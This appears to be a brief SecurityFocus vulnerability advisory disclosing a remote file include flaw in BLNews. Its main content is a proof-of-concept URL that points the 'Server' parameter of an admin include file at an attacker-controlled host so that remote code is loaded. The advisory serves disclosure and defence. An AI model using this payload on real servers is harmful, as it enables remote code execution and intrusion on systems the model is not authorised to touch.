BLNews Remote File Include Vulnerability

The following proof of concept URL has been supplied to demonstrate exploitation:

http://www.example.org/admin/objects.inc.php4?Server=http://www.attacker.org


 

Privacy Statement
Copyright 2010, SecurityFocus